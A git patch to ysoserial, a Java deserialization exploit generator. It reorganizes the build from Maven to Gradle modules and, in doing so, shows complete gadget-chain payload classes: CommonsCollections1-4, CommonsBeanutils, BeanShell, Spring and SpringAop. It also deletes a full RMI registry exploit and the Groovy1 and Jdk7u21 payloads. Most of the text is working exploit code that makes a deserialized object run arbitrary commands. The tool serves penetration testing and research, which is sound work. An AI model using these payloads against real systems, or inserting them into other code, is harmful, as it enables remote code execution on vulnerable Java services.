From 9a5325ed34b7872ff06f9d42a689fe43193f475c Mon Sep 17 00:00:00 2001 From: Philippe Arteau Date: Fri, 11 Mar 2016 14:10:58 -0500 Subject: [PATCH] Gradle build POC that isolate each gadget #10 --- .gitignore | 12 +- .travis.yml | 6 - build.gradle | 22 +++ gadget-beanutils-cc3/build.gradle | 8 + .../CommonsBeanutilsCollectionsLogging1.java | 84 +++++----- gadget-bsh/build.gradle | 7 + .../java/ysoserial/payloads/BeanShell1.java | 8 +- gadget-cc3/build.gradle | 7 + .../payloads/CommonsCollections1.java | 13 +- .../payloads/CommonsCollections3.java | 17 +- gadget-cc4/build.gradle | 7 + .../payloads/CommonsCollections2.java | 8 +- .../payloads/CommonsCollections4.java | 13 +- gadget-spring-aop/build.gradle | 9 ++ .../java/ysoserial/payloads/SpringAop.java | 28 ++-- gadget-spring/build.gradle | 8 + .../main/java/ysoserial/payloads/Spring1.java | 21 ++- pom.xml | 149 ------------------ settings.gradle | 9 ++ .../ysoserial/exploit/RMIRegistryExploit.java | 50 ------ src/main/java/ysoserial/payloads/Groovy1.java | 45 ------ src/main/java/ysoserial/payloads/Jdk7u21.java | 86 ---------- src/test/java/ysoserial/Throwables.java | 8 - .../exploit/RMIRegistryExploitTest.java | 18 --- .../java/ysoserial/payloads/PayloadsTest.java | 108 ------------- .../ysoserial/payloads/TestHarnessTest.java | 66 -------- ysoserial-cli/build.gradle | 59 +++++++ .../main/java/ysoserial/BootstrapMain.java | 35 ++++ ysoserial-core/build.gradle | 21 +++ .../main/java/ysoserial/Deserializer.java | 0 .../main/java/ysoserial/GeneratePayload.java | 8 +- .../src}/main/java/ysoserial/Serializer.java | 0 .../ysoserial/payloads/ObjectPayload.java | 5 +- .../payloads/annotation/Dependencies.java | 0 .../ysoserial/payloads/util/ClassFiles.java | 0 .../java/ysoserial/payloads/util/Gadgets.java | 25 ++- .../payloads/util/PayloadRunner.java | 9 +- .../ysoserial/payloads/util/PrintUtil.java | 1 - .../ysoserial/payloads/util/Reflections.java | 0 .../secmgr/DelegateSecurityManager.java | 1 + .../secmgr/ExecCheckingSecurityManager.java | 0 .../secmgr/ThreadLocalSecurityManager.java | 0 42 files changed, 311 insertions(+), 670 deletions(-) delete mode 100644 .travis.yml create mode 100644 build.gradle create mode 100644 gadget-beanutils-cc3/build.gradle rename {src => gadget-beanutils-cc3/src}/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java (97%) mode change 100755 => 100644 create mode 100644 gadget-bsh/build.gradle rename {src => gadget-bsh/src}/main/java/ysoserial/payloads/BeanShell1.java (97%) create mode 100644 gadget-cc3/build.gradle rename {src => gadget-cc3/src}/main/java/ysoserial/payloads/CommonsCollections1.java (97%) rename {src => gadget-cc3/src}/main/java/ysoserial/payloads/CommonsCollections3.java (95%) mode change 100755 => 100644 create mode 100644 gadget-cc4/build.gradle rename {src => gadget-cc4/src}/main/java/ysoserial/payloads/CommonsCollections2.java (99%) mode change 100755 => 100644 rename {src => gadget-cc4/src}/main/java/ysoserial/payloads/CommonsCollections4.java (99%) create mode 100644 gadget-spring-aop/build.gradle rename {src => gadget-spring-aop/src}/main/java/ysoserial/payloads/SpringAop.java (98%) create mode 100644 gadget-spring/build.gradle rename {src => gadget-spring/src}/main/java/ysoserial/payloads/Spring1.java (97%) delete mode 100644 pom.xml create mode 100644 settings.gradle delete mode 100644 src/main/java/ysoserial/exploit/RMIRegistryExploit.java delete mode 100644 src/main/java/ysoserial/payloads/Groovy1.java delete mode 100755 src/main/java/ysoserial/payloads/Jdk7u21.java delete mode 100644 src/test/java/ysoserial/Throwables.java delete mode 100755 src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java delete mode 100644 src/test/java/ysoserial/payloads/PayloadsTest.java delete mode 100755 src/test/java/ysoserial/payloads/TestHarnessTest.java create mode 100644 ysoserial-cli/build.gradle create mode 100644 ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java create mode 100644 ysoserial-core/build.gradle rename {src => ysoserial-core/src}/main/java/ysoserial/Deserializer.java (100%) mode change 100755 => 100644 rename {src => ysoserial-core/src}/main/java/ysoserial/GeneratePayload.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/Serializer.java (100%) mode change 100755 => 100644 rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/ObjectPayload.java (99%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/annotation/Dependencies.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/ClassFiles.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/Gadgets.java (98%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/PayloadRunner.java (93%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/PrintUtil.java (98%) rename {src => ysoserial-core/src}/main/java/ysoserial/payloads/util/Reflections.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/secmgr/DelegateSecurityManager.java (99%) mode change 100755 => 100644 rename {src => ysoserial-core/src}/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java (100%) rename {src => ysoserial-core/src}/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java (100%) mode change 100755 => 100644 diff --git a/.gitignore b/.gitignore index 0f616415..c54c4e2d 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,13 @@ -/target +target/ +build/ +.gradle/ +pwntest + +#Eclipse .classpath .project .settings/ -pwntest + +#IntelliJ .idea/ -*.iml \ No newline at end of file +*.iml diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 20a6b559..00000000 --- a/.travis.yml +++ /dev/null @@ -1,6 +0,0 @@ -language: java -jdk: - - oraclejdk8 - - oraclejdk7 - - openjdk7 - - openjdk6 \ No newline at end of file diff --git a/build.gradle b/build.gradle new file mode 100644 index 00000000..cdace32d --- /dev/null +++ b/build.gradle @@ -0,0 +1,22 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +subprojects { //Common configuration for subprojects + apply plugin: 'java' + + sourceCompatibility = 1.7 + + repositories { + mavenCentral() + } +} + + +subprojects { + + compileJava { + options.encoding = 'UTF-8' + //options.compilerArgs << "-Xlint:unchecked" << "-Xlint:deprecation" + options.compilerArgs << "-Xlint:none" + } +} \ No newline at end of file diff --git a/gadget-beanutils-cc3/build.gradle b/gadget-beanutils-cc3/build.gradle new file mode 100644 index 00000000..34c32e82 --- /dev/null +++ b/gadget-beanutils-cc3/build.gradle @@ -0,0 +1,8 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'commons-beanutils', name: 'commons-beanutils', version: '1.9.2' + compile group: 'commons-collections', name: 'commons-collections', version: '3.1' + compile project(':ysoserial-core') +} \ No newline at end of file diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java b/gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java old mode 100755 new mode 100644 similarity index 97% rename from src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java rename to gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java index 27b34d1a..18ec93da --- a/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java +++ b/gadget-beanutils-cc3/src/main/java/ysoserial/payloads/CommonsBeanutilsCollectionsLogging1.java @@ -1,44 +1,42 @@ -package ysoserial.payloads; - -import java.math.BigInteger; -import java.util.PriorityQueue; - -import org.apache.commons.beanutils.BeanComparator; - -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.Gadgets; -import ysoserial.payloads.util.PayloadRunner; -import ysoserial.payloads.util.Reflections; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; - -@SuppressWarnings({ "rawtypes", "unchecked", "restriction" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) -public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload { - - public Object getObject(final String command) throws Exception { - final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); - // mock method name until armed - final BeanComparator comparator = new BeanComparator("lowestSetBit"); - - // create queue with numbers and basic comparator - final PriorityQueue queue = new PriorityQueue(2, comparator); - // stub data for replacement later - queue.add(new BigInteger("1")); - queue.add(new BigInteger("1")); - - // switch method called by comparator - Reflections.setFieldValue(comparator, "property", "outputProperties"); - - // switch contents of queue - final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); - queueArray[0] = templates; - queueArray[1] = templates; - - return queue; - } - - public static void main(final String[] args) throws Exception { - PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args); - } +package ysoserial.payloads; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import org.apache.commons.beanutils.BeanComparator; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.Gadgets; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + +import java.math.BigInteger; +import java.util.PriorityQueue; + +@SuppressWarnings({ "rawtypes", "unchecked", "restriction" }) +@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) +public class CommonsBeanutilsCollectionsLogging1 implements ObjectPayload { + + public Object getObject(final String command) throws Exception { + final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); + // mock method name until armed + final BeanComparator comparator = new BeanComparator("lowestSetBit"); + + // create queue with numbers and basic comparator + final PriorityQueue queue = new PriorityQueue(2, comparator); + // stub data for replacement later + queue.add(new BigInteger("1")); + queue.add(new BigInteger("1")); + + // switch method called by comparator + Reflections.setFieldValue(comparator, "property", "outputProperties"); + + // switch contents of queue + final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue"); + queueArray[0] = templates; + queueArray[1] = templates; + + return queue; + } + + public static void main(final String[] args) throws Exception { + PayloadRunner.run(CommonsBeanutilsCollectionsLogging1.class, args); + } } \ No newline at end of file diff --git a/gadget-bsh/build.gradle b/gadget-bsh/build.gradle new file mode 100644 index 00000000..6330b8d7 --- /dev/null +++ b/gadget-bsh/build.gradle @@ -0,0 +1,7 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.beanshell', name: 'bsh', version: '2.0b5' + compile project(':ysoserial-core') +} \ No newline at end of file diff --git a/src/main/java/ysoserial/payloads/BeanShell1.java b/gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java similarity index 97% rename from src/main/java/ysoserial/payloads/BeanShell1.java rename to gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java index 04b61e18..5b1b5f5f 100644 --- a/src/main/java/ysoserial/payloads/BeanShell1.java +++ b/gadget-bsh/src/main/java/ysoserial/payloads/BeanShell1.java @@ -2,16 +2,14 @@ import bsh.Interpreter; import bsh.XThis; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; -import java.io.*; -import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.Comparator; import java.util.PriorityQueue; -import ysoserial.payloads.util.Reflections; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.PayloadRunner; /** * Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711) diff --git a/gadget-cc3/build.gradle b/gadget-cc3/build.gradle new file mode 100644 index 00000000..da3a23a0 --- /dev/null +++ b/gadget-cc3/build.gradle @@ -0,0 +1,7 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'commons-collections', name: 'commons-collections', version: '3.1' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/CommonsCollections1.java b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java similarity index 97% rename from src/main/java/ysoserial/payloads/CommonsCollections1.java rename to gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java index b4e8b921..275b781a 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections1.java +++ b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections1.java @@ -1,20 +1,19 @@ package ysoserial.payloads; -import java.lang.reflect.InvocationHandler; -import java.util.HashMap; -import java.util.Map; - import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; + /* Gadget chain: ObjectInputStream.readObject() @@ -67,8 +66,8 @@ public InvocationHandler getObject(final String command) throws Exception { final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy); - Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain - + Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain + return handler; } diff --git a/src/main/java/ysoserial/payloads/CommonsCollections3.java b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java old mode 100755 new mode 100644 similarity index 95% rename from src/main/java/ysoserial/payloads/CommonsCollections3.java rename to gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java index a0cf5725..65c6ae68 --- a/src/main/java/ysoserial/payloads/CommonsCollections3.java +++ b/gadget-cc3/src/main/java/ysoserial/payloads/CommonsCollections3.java @@ -1,27 +1,24 @@ package ysoserial.payloads; -import java.lang.reflect.InvocationHandler; -import java.util.HashMap; -import java.util.Map; - -import javax.xml.transform.Templates; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; import org.apache.commons.collections.map.LazyMap; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import javax.xml.transform.Templates; +import java.lang.reflect.InvocationHandler; +import java.util.HashMap; +import java.util.Map; /* - * Variation on CommonsCollections1 that uses InstantiateTransformer instead of + * Variation on ysoserial.commons.payloads.CommonsCollections1 that uses InstantiateTransformer instead of * InvokerTransformer. */ @SuppressWarnings({"rawtypes", "unchecked"}) diff --git a/gadget-cc4/build.gradle b/gadget-cc4/build.gradle new file mode 100644 index 00000000..2aee1b90 --- /dev/null +++ b/gadget-cc4/build.gradle @@ -0,0 +1,7 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.apache.commons', name: 'commons-collections4', version: '4.0' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/CommonsCollections2.java b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java old mode 100755 new mode 100644 similarity index 99% rename from src/main/java/ysoserial/payloads/CommonsCollections2.java rename to gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java index bbfcd1cd..727d5dad --- a/src/main/java/ysoserial/payloads/CommonsCollections2.java +++ b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections2.java @@ -1,17 +1,15 @@ package ysoserial.payloads; -import java.util.PriorityQueue; -import java.util.Queue; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.InvokerTransformer; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import java.util.PriorityQueue; +import java.util.Queue; /* Gadget chain: diff --git a/src/main/java/ysoserial/payloads/CommonsCollections4.java b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java similarity index 99% rename from src/main/java/ysoserial/payloads/CommonsCollections4.java rename to gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java index 76c6f6c9..7efd4bff 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections4.java +++ b/gadget-cc4/src/main/java/ysoserial/payloads/CommonsCollections4.java @@ -1,23 +1,20 @@ package ysoserial.payloads; -import java.util.PriorityQueue; -import java.util.Queue; - -import javax.xml.transform.Templates; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InstantiateTransformer; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; +import javax.xml.transform.Templates; +import java.util.PriorityQueue; +import java.util.Queue; /* * Variation on CommonsCollections2 that uses InstantiateTransformer instead of diff --git a/gadget-spring-aop/build.gradle b/gadget-spring-aop/build.gradle new file mode 100644 index 00000000..2f482b73 --- /dev/null +++ b/gadget-spring-aop/build.gradle @@ -0,0 +1,9 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.springframework', name: 'spring-core', version: '3.0.5.RELEASE' + compile group: 'org.springframework', name: 'spring-beans', version: '3.0.5.RELEASE' + compile group: 'org.springframework', name: 'spring-aop', version: '3.0.5.RELEASE' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/SpringAop.java b/gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java similarity index 98% rename from src/main/java/ysoserial/payloads/SpringAop.java rename to gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java index 7daa8bd9..750f84e7 100644 --- a/src/main/java/ysoserial/payloads/SpringAop.java +++ b/gadget-spring-aop/src/main/java/ysoserial/payloads/SpringAop.java @@ -1,28 +1,26 @@ package ysoserial.payloads; -import org.springframework.beans.factory.support.DefaultListableBeanFactory; -import org.springframework.beans.factory.support.GenericBeanDefinition; -import org.springframework.aop.target.SimpleBeanTargetSource; +import javassist.ClassPool; +import javassist.CtClass; +import javassist.CtMethod; +import javassist.LoaderClassPath; +import javassist.SerialVersionUID; import org.springframework.aop.framework.AdvisedSupport; import org.springframework.aop.framework.DefaultAopProxyFactory; - -import java.io.NotSerializableException; -import java.lang.reflect.InvocationHandler; -import java.lang.reflect.Proxy; - +import org.springframework.aop.target.SimpleBeanTargetSource; import org.springframework.beans.factory.config.BeanDefinition; - -import java.util.Collections; - import org.springframework.beans.factory.config.MethodInvokingFactoryBean; - +import org.springframework.beans.factory.support.DefaultListableBeanFactory; +import org.springframework.beans.factory.support.GenericBeanDefinition; import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.PrintUtil; import ysoserial.payloads.util.PayloadRunner; - -import javassist.*; +import ysoserial.payloads.util.PrintUtil; import ysoserial.payloads.util.Reflections; +import java.io.NotSerializableException; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.Collections; import java.util.List; /** diff --git a/gadget-spring/build.gradle b/gadget-spring/build.gradle new file mode 100644 index 00000000..efe8b21a --- /dev/null +++ b/gadget-spring/build.gradle @@ -0,0 +1,8 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.springframework', name: 'spring-core', version: '4.1.4.RELEASE' + compile group: 'org.springframework', name: 'spring-beans', version: '4.1.4.RELEASE' + compile project(':ysoserial-core') +} diff --git a/src/main/java/ysoserial/payloads/Spring1.java b/gadget-spring/src/main/java/ysoserial/payloads/Spring1.java similarity index 97% rename from src/main/java/ysoserial/payloads/Spring1.java rename to gadget-spring/src/main/java/ysoserial/payloads/Spring1.java index f655cfb8..329b3f18 100644 --- a/src/main/java/ysoserial/payloads/Spring1.java +++ b/gadget-spring/src/main/java/ysoserial/payloads/Spring1.java @@ -1,21 +1,18 @@ package ysoserial.payloads; -import static java.lang.Class.forName; - -import java.lang.reflect.Constructor; -import java.lang.reflect.InvocationHandler; -import java.lang.reflect.Type; - -import javax.xml.transform.Templates; - +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.springframework.beans.factory.ObjectFactory; - import ysoserial.payloads.annotation.Dependencies; import ysoserial.payloads.util.Gadgets; import ysoserial.payloads.util.PayloadRunner; import ysoserial.payloads.util.Reflections; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import javax.xml.transform.Templates; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Type; + +import static java.lang.Class.forName; /* Gadget chain: @@ -56,12 +53,12 @@ public Object getObject(final String command) throws Exception { final ObjectFactory objectFactoryProxy = Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class); - final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) + final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler") .newInstance(objectFactoryProxy), Type.class, Templates.class); final Object typeProviderProxy = Gadgets.createMemoitizedProxy( - Gadgets.createMap("getType", typeTemplatesProxy), + Gadgets.createMap("getType", typeTemplatesProxy), forName("org.springframework.core.SerializableTypeWrapper$TypeProvider")); final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"); diff --git a/pom.xml b/pom.xml deleted file mode 100644 index 9056d734..00000000 --- a/pom.xml +++ /dev/null @@ -1,149 +0,0 @@ - - 4.0.0 - - ysoserial - ysoserial - 0.0.5-SNAPSHOT - jar - - ysoserial - http://maven.apache.org - - - UTF-8 - 4.1.4.RELEASE - - - - - - org.apache.maven.plugins - maven-compiler-plugin - 3.2 - - 1.5 - 1.5 - - - - maven-assembly-plugin - - ${project.artifactId}-${project.version}-all - false - - - ysoserial.GeneratePayload - - - - jar-with-dependencies - - - - - make-assembly - package - - single - - - - - - - - - - - - - junit - junit - 4.12 - test - - - org.mockito - mockito-core - 1.10.19 - test - - - com.github.stefanbirkner - system-rules - 1.8.0 - test - - - - - - org.reflections - reflections - 0.9.9 - - - org.jboss.shrinkwrap.resolver - shrinkwrap-resolver-depchain - 2.1.1 - pom - - - org.javassist - javassist - 3.19.0-GA - - - - - - commons-collections - commons-collections - 3.1 - - - org.beanshell - bsh - 2.0b5 - - - commons-beanutils - commons-beanutils - 1.9.2 - - - org.apache.commons - commons-collections4 - 4.0 - - - org.codehaus.groovy - groovy - 2.3.9 - - - org.springframework - spring-core - ${spring.version} - - - org.springframework - spring-beans - ${spring.version} - - - - - org.springframework - spring-aop - ${spring.version} - - - org.aspectj - aspectjweaver - 1.8.8 - - - - diff --git a/settings.gradle b/settings.gradle new file mode 100644 index 00000000..95461d1a --- /dev/null +++ b/settings.gradle @@ -0,0 +1,9 @@ +rootProject.name = 'ysoserial' +include 'gadget-cc3' +include 'gadget-cc4' +include 'gadget-bsh' +include 'gadget-beanutils-cc3' +include 'gadget-spring' +include 'gadget-spring-aop' +include 'ysoserial-core' +include 'ysoserial-cli' diff --git a/src/main/java/ysoserial/exploit/RMIRegistryExploit.java b/src/main/java/ysoserial/exploit/RMIRegistryExploit.java deleted file mode 100644 index 7286a00e..00000000 --- a/src/main/java/ysoserial/exploit/RMIRegistryExploit.java +++ /dev/null @@ -1,50 +0,0 @@ -package ysoserial.exploit; - -import java.rmi.Remote; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; -import java.util.Arrays; -import java.util.concurrent.Callable; - -import ysoserial.payloads.CommonsCollections1; -import ysoserial.payloads.ObjectPayload; -import ysoserial.payloads.util.Gadgets; -import ysoserial.secmgr.ExecCheckingSecurityManager; - -/* - * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader. - * Attempts to exploit the registry itself, then enumerates registered endpoints and their interfaces. - * - * TODO: automatic exploitation of endpoints, potentially with automated download and use of jars containing remote - * interfaces. See http://www.findmaven.net/api/find/class/org.springframework.remoting.rmi.RmiInvocationHandler . - */ -public class RMIRegistryExploit { - public static void main(final String[] args) throws Exception { - final String host = args[0]; - final int port = Integer.parseInt(args[1]); - final String command = args[3]; - final Registry registry = LocateRegistry.getRegistry(host, port); - final String className = CommonsCollections1.class.getPackage().getName() + "." + args[2]; - final Class payloadClass = (Class) Class.forName(className); - - // ensure payload doesn't detonate during construction or deserialization - exploit(registry, payloadClass, command); - } - - public static void exploit(final Registry registry, - final Class payloadClass, - final String command) throws Exception { - new ExecCheckingSecurityManager().wrap(new Callable(){public Void call() throws Exception { - Object payload = payloadClass.newInstance().getObject(command); - String name = "pwned" + System.nanoTime(); - Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class); - try { - registry.bind(name, remote); - } catch (Throwable e) { - e.printStackTrace(); - } - - return null; - }}); - } -} diff --git a/src/main/java/ysoserial/payloads/Groovy1.java b/src/main/java/ysoserial/payloads/Groovy1.java deleted file mode 100644 index 5d249921..00000000 --- a/src/main/java/ysoserial/payloads/Groovy1.java +++ /dev/null @@ -1,45 +0,0 @@ -package ysoserial.payloads; - -import java.lang.reflect.InvocationHandler; -import java.util.Map; - -import org.codehaus.groovy.runtime.ConvertedClosure; -import org.codehaus.groovy.runtime.MethodClosure; - -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.Gadgets; -import ysoserial.payloads.util.PayloadRunner; - -/* - Gadget chain: - ObjectInputStream.readObject() - PriorityQueue.readObject() - Comparator.compare() (Proxy) - ConvertedClosure.invoke() - MethodClosure.call() - ... - Method.invoke() - Runtime.exec() - - Requires: - groovy - */ - -@SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"org.codehaus.groovy:groovy:2.3.9"}) -public class Groovy1 extends PayloadRunner implements ObjectPayload { - - public InvocationHandler getObject(final String command) throws Exception { - final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet"); - - final Map map = Gadgets.createProxy(closure, Map.class); - - final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map); - - return handler; - } - - public static void main(final String[] args) throws Exception { - PayloadRunner.run(Groovy1.class, args); - } -} diff --git a/src/main/java/ysoserial/payloads/Jdk7u21.java b/src/main/java/ysoserial/payloads/Jdk7u21.java deleted file mode 100755 index 342f3061..00000000 --- a/src/main/java/ysoserial/payloads/Jdk7u21.java +++ /dev/null @@ -1,86 +0,0 @@ -package ysoserial.payloads; - -import java.lang.reflect.InvocationHandler; -import java.util.HashMap; -import java.util.LinkedHashSet; - -import javax.xml.transform.Templates; - -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.Gadgets; -import ysoserial.payloads.util.PayloadRunner; -import ysoserial.payloads.util.Reflections; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; - -/* - -Gadget chain that works against JRE 1.7u21 and earlier. Payload generation has -the same JRE version requirements. - -See: https://gist.github.com/frohoff/24af7913611f8406eaf3 - -Call tree: - -LinkedHashSet.readObject() - LinkedHashSet.add() - ... - TemplatesImpl.hashCode() (X) - LinkedHashSet.add() - ... - Proxy(Templates).hashCode() (X) - AnnotationInvocationHandler.invoke() (X) - AnnotationInvocationHandler.hashCodeImpl() (X) - String.hashCode() (0) - AnnotationInvocationHandler.memberValueHashCode() (X) - TemplatesImpl.hashCode() (X) - Proxy(Templates).equals() - AnnotationInvocationHandler.invoke() - AnnotationInvocationHandler.equalsImpl() - Method.invoke() - ... - TemplatesImpl.getOutputProperties() - TemplatesImpl.newTransformer() - TemplatesImpl.getTransletInstance() - TemplatesImpl.defineTransletClasses() - ClassLoader.defineClass() - Class.newInstance() - ... - MaliciousClass.() - ... - Runtime.exec() - */ - -@SuppressWarnings({ "rawtypes", "unchecked", "restriction" }) -@Dependencies() -public class Jdk7u21 implements ObjectPayload { - - public Object getObject(final String command) throws Exception { - final TemplatesImpl templates = Gadgets.createTemplatesImpl(command); - - String zeroHashCodeStr = "f5a5a608"; - - HashMap map = new HashMap(); - map.put(zeroHashCodeStr, "foo"); - - InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); - Reflections.setFieldValue(tempHandler, "type", Templates.class); - Templates proxy = Gadgets.createProxy(tempHandler, Templates.class); - - LinkedHashSet set = new LinkedHashSet(); // maintain order - set.add(templates); - set.add(proxy); - - Reflections.setFieldValue(templates, "_auxClasses", null); - Reflections.setFieldValue(templates, "_class", null); - - map.put(zeroHashCodeStr, templates); // swap in real object - - return set; - } - - public static void main(final String[] args) throws Exception { - PayloadRunner.run(Jdk7u21.class, args); - } - -} diff --git a/src/test/java/ysoserial/Throwables.java b/src/test/java/ysoserial/Throwables.java deleted file mode 100644 index 921e4938..00000000 --- a/src/test/java/ysoserial/Throwables.java +++ /dev/null @@ -1,8 +0,0 @@ -package ysoserial; - -public class Throwables { - public static Throwable getInnermostCause(final Throwable t) { - final Throwable cause = t.getCause(); - return cause == null || cause == t ? t : getInnermostCause(cause); - } -} \ 